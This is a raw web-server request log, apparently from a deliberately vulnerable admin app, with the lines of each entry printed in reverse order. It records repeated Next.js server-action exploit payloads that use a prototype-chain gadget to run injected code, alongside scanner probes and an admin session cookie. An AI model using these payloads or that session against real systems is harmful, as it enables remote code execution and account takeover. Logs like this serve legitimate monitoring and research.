User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:38776
Path: /api/route
URL: /api/route
Method: POST
[2026-03-12 04:09:15] === HTTP Request ===
===================
------WebKitFormBoundaryx1906543088227--
------WebKitFormBoundaryx1906543088227
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1906543088227
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 246102+true+7746963;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1906543088227
X-Nextjs-Html-Request-Id: ilovepoop_1906543088227
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1906543088227
X-Nextjs-Request-Id: poop1234
Connection: close
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:38760
Path: /app
URL: /app
Method: POST
[2026-03-12 04:09:15] === HTTP Request ===
===================
------WebKitFormBoundaryx658359359146--
------WebKitFormBoundaryx658359359146
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx658359359146
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 143109+true+4600405;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx658359359146
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx658359359146
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
X-Nextjs-Html-Request-Id: ilovepoop_658359359146
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:38752
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-12 04:09:15] === HTTP Request ===
===================
------WebKitFormBoundaryx40938567733--
------WebKitFormBoundaryx40938567733
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx40938567733
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 17343+true+2360524;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx40938567733
X-Nextjs-Html-Request-Id: ilovepoop_40938567733
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx40938567733
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Connection: close
Content-Length: 513
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:38746
Path: /api
URL: /api
Method: POST
[2026-03-12 04:09:12] === HTTP Request ===
===================
------WebKitFormBoundaryx376371997805--
------WebKitFormBoundaryx376371997805
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx376371997805
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 67892+true+5543687;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx376371997805
X-Nextjs-Html-Request-Id: ilovepoop_376371997805
Next-Action: x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 517
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx376371997805
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:38734
Path: /_next
URL: /_next
Method: POST
[2026-03-12 04:09:12] === HTTP Request ===
[2026-03-12 04:09:12] Main page accessed - IP: 195.3.221.86:38726
===================
------WebKitFormBoundaryx14105139121--
------WebKitFormBoundaryx14105139121
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx14105139121
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 6102+true+2311560;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx14105139121
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx14105139121
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
X-Nextjs-Html-Request-Id: ilovepoop_14105139121
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Connection: close
Content-Length: 512
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:38726
Path: /
URL: /
Method: POST
[2026-03-12 04:09:12] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 172.202.118.47:52644
Path: /manager/html
URL: /manager/html
Method: GET
[2026-03-12 04:07:14] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 206.168.34.223:59834
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-12 02:53:17] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 206.168.34.223:59824
Path: *
URL: *
Method: PRI
[2026-03-12 02:53:16] === HTTP Request ===
[2026-03-12 02:53:14] Main page accessed - IP: 206.168.34.223:59812
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 206.168.34.223:59812
Path: /
URL: /
Method: GET
[2026-03-12 02:53:14] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.10:7227
RemoteAddr: 176.65.148.2:4016
Path:
URL: //185.65.245.10:7227
Method: CONNECT
[2026-03-12 02:50:59] === HTTP Request ===
[2026-03-12 01:54:48] Main page accessed - IP: 178.128.30.185:56300
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.128.30.185:56300
Path: /
URL: /
Method: GET
[2026-03-12 01:54:48] === HTTP Request ===
===================
Accept-Encoding: deflate, gzip, identity
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Referer: http://95.143.191.38:8081/
Accept-Language: en-US;q=0.6,en;q=0.4
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 194.186.99.146:56943
Path: /HNAP1/
URL: /HNAP1/
Method: GET
[2026-03-12 00:38:41] === HTTP Request ===
[2026-03-12 00:38:41] Main page accessed - IP: 194.186.99.146:56844
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Accept-Language: en-US;q=0.6,en;q=0.4
Accept-Encoding: deflate, gzip, identity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 194.186.99.146:56844
Path: /
URL: /
Method: GET
[2026-03-12 00:38:41] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50028
Path: /terraform.tfstate.backup
URL: /terraform.tfstate.backup
Method: GET
[2026-03-11 23:32:30] === HTTP Request ===
[2026-03-11 23:31:52] Main page accessed - IP: 159.65.13.145:39190
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 159.65.13.145:39190
Path: /
URL: /
Method: GET
[2026-03-11 23:31:52] === HTTP Request ===
[2026-03-11 22:25:08] Main page accessed - IP: 176.65.149.45:34834
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:34834
Path: /
URL: /
Method: GET
[2026-03-11 22:25:08] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +``https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.103:35874
Path: /auth/login/sentry/
URL: /auth/login/sentry/
Method: GET
[2026-03-11 22:12:16] === HTTP Request ===
===================
------WebKitFormBoundaryx3964605247--
------WebKitFormBoundaryx3964605247
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx3964605247
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 36486+true+108661;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx3964605247
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
X-Nextjs-Html-Request-Id: ilovepoop_3964605247
Connection: close
Content-Length: 508
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx3964605247
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:54460
Path: /api/route
URL: /api/route
Method: POST
[2026-03-11 21:21:50] === HTTP Request ===
===================
------WebKitFormBoundaryx494261681191--
------WebKitFormBoundaryx494261681191
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx494261681191
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 82506+true+5990615;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx494261681191
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Connection: close
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_494261681191
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx494261681191
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:54454
Path: /app
URL: /app
Method: POST
[2026-03-11 21:21:48] === HTTP Request ===
===================
------WebKitFormBoundaryx1709806889297--
------WebKitFormBoundaryx1709806889297
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1709806889297
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 224368+true+7620547;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1709806889297
X-Nextjs-Html-Request-Id: ilovepoop_1709806889297
Content-Length: 522
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1709806889297
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:54440
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-11 21:21:48] === HTTP Request ===
===================
------WebKitFormBoundaryx663194027881--
------WebKitFormBoundaryx663194027881
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx663194027881
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 83124+true+7978370;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx663194027881
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 517
Next-Action: x
X-Nextjs-Request-Id: poop1234
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_663194027881
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx663194027881
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:54430
Path: /api
URL: /api
Method: POST
[2026-03-11 21:21:48] === HTTP Request ===
===================
------WebKitFormBoundaryx1846244370738--
------WebKitFormBoundaryx1846244370738
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1846244370738
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 339209+true+5442793;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1846244370738
X-Nextjs-Html-Request-Id: ilovepoop_1846244370738
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1846244370738
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 522
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:54426
Path: /_next
URL: /_next
Method: POST
[2026-03-11 21:21:47] === HTTP Request ===
[2026-03-11 21:21:47] Main page accessed - IP: 195.3.221.86:54418
===================
------WebKitFormBoundaryx1616268884867--
------WebKitFormBoundaryx1616268884867
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1616268884867
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 268297+true+6024178;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1616268884867
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1616268884867
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1616268884867
X-Nextjs-Request-Id: poop1234
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:54418
Path: /
URL: /
Method: POST
[2026-03-11 21:21:47] === HTTP Request ===
[2026-03-11 20:35:20] Main page accessed - IP: 192.109.200.205:62028
===================
------B1773261320065661793--
"$@0"
Content-Disposition: form-data; name="1"
------B1773261320065661793
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"test","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------B1773261320065661793
Content-Length: 358
User-Agent: Mozilla/5.0
Connection: close
Accept-Encoding: gzip
Next-Action: x
Content-Type: multipart/form-data; boundary=----B1773261320065661793
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 192.109.200.205:62028
Path: /
URL: /
Method: POST
[2026-03-11 20:35:20] === HTTP Request ===
[2026-03-11 20:35:20] Main page accessed - IP: 192.109.200.205:62020
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 192.109.200.205:62020
Path: /
URL: /
Method: GET
[2026-03-11 20:35:20] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.140:7227
RemoteAddr: 94.103.188.107:31586
Path:
URL: //185.65.245.140:7227
Method: CONNECT
[2026-03-11 19:44:54] === HTTP Request ===
[2026-03-11 19:39:33] Main page accessed - IP: 147.185.132.231:50392
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 147.185.132.231:50392
Path: /
URL: /
Method: GET
[2026-03-11 19:39:33] === HTTP Request ===
[2026-03-11 19:34:33] Logs page accessed - IP: 172.30.0.12:50148
===================
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Priority: u=1, i
Cookie: auth=sess_1773233005829118282; user_id=9
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Platform: "macOS"
Referer: https://admin.vulnberries.ru/salary
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50148
Path: /logs
URL: /logs
Method: GET
[2026-03-11 19:34:33] === HTTP Request ===
[2026-03-11 19:23:55] Main page accessed - IP: 52.165.80.115:37802
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 52.165.80.115:37802
Path: /
URL: /
Method: GET
[2026-03-11 19:23:55] === HTTP Request ===
[2026-03-11 19:21:13] Salary page accessed - IP: 172.30.0.12:36240
===================
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Priority: u=1, i
Cookie: auth=sess_1773233005829118282; user_id=9
Authorization: Bearer Bearer eyJhbGciOiJIU...
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
X-Forwarded-Host: admin.vulnberries.ru
Accept-Encoding: gzip, deflate, br, zstd
Via: 2.0 Caddy
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/salary
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-For: 45.85.105.205
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36240
Path: /salary
URL: /salary
Method: GET
[2026-03-11 19:21:13] === HTTP Request ===
[2026-03-11 19:11:57] Salary page accessed - IP: 172.30.0.12:52000
===================
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-For: 45.85.105.205
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Cookie: auth=sess_1773233005829118282; user_id=9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
Referer: https://admin.vulnberries.ru/goods
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52000
Path: /salary
URL: /salary
Method: GET
[2026-03-11 19:11:57] === HTTP Request ===
[2026-03-11 19:03:43] Main page accessed - IP: 178.128.30.185:52184
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.128.30.185:52184
Path: /
URL: /
Method: GET
[2026-03-11 19:03:43] === HTTP Request ===
[2026-03-11 19:00:03] Goods page accessed - IP: 172.30.0.12:53922
===================
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/defects
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.205
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Priority: u=1, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Cookie: auth=sess_1773233005829118282; user_id=9
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:53922
Path: /goods
URL: /goods
Method: GET
[2026-03-11 19:00:03] === HTTP Request ===
[2026-03-11 18:58:29] Defects page accessed - IP: 172.30.0.12:53922
===================
Sec-Fetch-Mode: cors
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Cookie: auth=sess_1773233005829118282; user_id=9
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Referer: https://admin.vulnberries.ru/goods
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Priority: u=1, i
Via: 2.0 Caddy
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Platform: "macOS"
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-Proto: https
X-Forwarded-For: 45.85.105.205
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:53922
Path: /defects
URL: /defects
Method: GET
[2026-03-11 18:58:29] === HTTP Request ===
[2026-03-11 18:09:24] Goods page accessed - IP: 172.30.0.12:54020
===================
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
Priority: u=1, i
X-Forwarded-For: 45.85.105.205
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Cookie: auth=sess_1773233005829118282; user_id=9
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54020
Path: /goods
URL: /goods
Method: GET
[2026-03-11 18:09:24] === HTTP Request ===
[2026-03-11 18:09:22] Main page accessed - IP: 172.30.0.12:54020
===================
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/
X-Forwarded-For: 45.85.105.205
Cookie: auth=sess_1773233005829118282; user_id=9
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
X-Forwarded-Proto: https
Via: 2.0 Caddy
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54020
Path: /
URL: /
Method: GET
[2026-03-11 18:09:22] === HTTP Request ===
[2026-03-11 18:09:21] Goods page accessed - IP: 172.30.0.12:54020
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.205
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Mobile: ?0
Priority: u=1, i
Cookie: auth=sess_1773233005829118282; user_id=9
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
Referer: https://admin.vulnberries.ru/defects
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54020
Path: /goods
URL: /goods
Method: GET
[2026-03-11 18:09:21] === HTTP Request ===
[2026-03-11 18:09:21] Main page accessed - IP: 172.30.0.12:54020
===================
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Accept-Encoding: gzip, deflate, br, zstd
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: navigate
Priority: u=0, i
Cookie: auth=sess_1773233005829118282; user_id=9
Cache-Control: max-age=0
X-Forwarded-For: 45.85.105.205
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/defects
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54020
Path: /
URL: /
Method: GET
[2026-03-11 18:09:21] === HTTP Request ===
[2026-03-11 18:04:14] Main page accessed - IP: 104.236.121.106:36454
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
